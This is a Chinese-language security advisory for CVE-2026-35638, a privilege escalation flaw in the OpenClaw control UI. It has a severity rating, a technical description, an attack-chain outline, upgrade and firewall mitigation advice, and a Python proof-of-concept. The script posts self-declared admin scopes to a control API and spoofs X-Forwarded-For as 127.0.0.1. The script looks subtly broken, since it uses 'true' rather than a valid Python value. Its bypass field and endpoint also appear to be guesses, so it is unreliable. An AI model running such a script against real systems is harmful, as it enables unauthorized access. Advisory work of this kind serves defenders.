CVE-2026-35638 CVSS 8.8 高危

CVE-2026-35638 OpenClaw权限提升漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35638

漏洞类型

权限提升

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.22 之前的版本在控制 UI 中存在权限提升漏洞。该漏洞允许未经身份验证的会话在无需设备身份验证的情况下，保留自行声明的特权范围。攻击者可利用受信任代理机制中的无设备允许路径，通过声明任意范围来维持提升的权限，从而绕过设备身份要求获取系统控制权。

技术细节

该漏洞源于 OpenClaw 控制界面中受信任代理机制的逻辑缺陷。在正常流程中，获取特权范围需要严格的设备身份验证，但受影响版本保留了一条“无设备允许路径”。攻击者可利用此路径创建未认证会话，并在请求中自行声明所需的特权范围。由于系统在该路径下未强制执行设备身份校验，攻击者能够成功保留并维持这些提升后的权限。这使得攻击者能够绕过设备身份绑定这一关键安全防线，非法获取系统的高级别访问权限，进而对系统的机密性、完整性和可用性造成严重破坏。

攻击链分析

STEP 1

侦察阶段

攻击者识别网络上存在的 OpenClaw 实例，并确定其版本低于 2026.3.22。

STEP 2

漏洞利用

攻击者向控制 UI 发送特制请求，利用受信任代理机制中的“无设备允许路径”，并在请求中自行声明特权范围。

STEP 3

权限维持

由于系统未验证设备身份，攻击者的会话成功保留了声明的特权范围，获得未授权的高级别访问权限。

STEP 4

执行攻击

攻击者利用获取的高权限执行恶意操作，如窃取敏感数据、修改配置或破坏服务可用性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL for the vulnerable OpenClaw Control UI
target_url = "http://target-openclaw-instance/api/control/authorize"

# Headers to simulate a trusted proxy or internal request
headers = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/json",
    "X-Forwarded-For": "127.0.0.1" # May be required to hit the device-less path
}

# Payload declaring self-declared privileged scopes
# Exploiting the lack of device identity verification
payload = {
    "session_id": "unauthenticated_session_token",
    "scopes": ["admin", "read", "write", "execute"],
    "device_verify_bypass": true # Logic to exploit the device-less allow path
}

try:
    # Send POST request to escalate privileges
    response = requests.post(target_url, json=payload, headers=headers)

    if response.status_code == 200:
        print("[+] Privilege escalation successful!")
        print("[+] Granted Scopes:", response.json().get("scopes"))
    else:
        print("[-] Exploit failed. Status code:", response.status_code)
        print("[-] Response:", response.text)

except Exception as e:
    print("Error occurred:", str(e))

影响范围

OpenClaw < 2026.3.22

防御指南

临时缓解措施

建议立即升级至 OpenClaw 2026.3.22 或更高版本以彻底修复该漏洞。若暂时无法升级，应通过防火墙限制对 OpenClaw 控制端口的访问，仅允许受信任的 IP 地址连接，并加强对未经身份验证的会话的监控，以及时发现潜在的攻击行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表